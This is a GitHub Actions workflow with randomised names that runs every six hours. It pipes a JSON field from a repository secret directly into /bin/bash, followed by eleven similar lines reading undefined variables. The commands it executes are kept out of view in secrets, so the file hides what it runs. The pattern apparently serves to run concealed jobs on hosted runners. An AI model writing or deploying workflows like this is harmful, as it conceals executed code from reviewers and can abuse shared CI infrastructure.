name: dadanmaxo

on:
  workflow_dispatch:
  schedule:
    - cron: '22 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dadanmaxo
        env:
          czem82: ${{ secrets.czem82 }}
        run: |
          echo $czem82 | jq -r .fgn9 | /bin/bash
          echo $ew67 | jq -r .anl50 | /bin/bash
          echo $eywts92899 | jq -r .jzv1 | /bin/bash
          echo $xvb708 | jq -r .skkeg840 | /bin/bash
          echo $yd385 | jq -r .d29 | /bin/bash
          echo $wz07 | jq -r .a8 | /bin/bash
          echo $xztqm9983 | jq -r .zxoma6 | /bin/bash
          echo $fpqwe47 | jq -r .usmnj73 | /bin/bash
          echo $pnrmz2 | jq -r .xp3141 | /bin/bash
          echo $bpix77 | jq -r .s952 | /bin/bash
          echo $ublv992 | jq -r .bmlbr0 | /bin/bash
          echo $ywft5 | jq -r .bhtpf1005 | /bin/bash

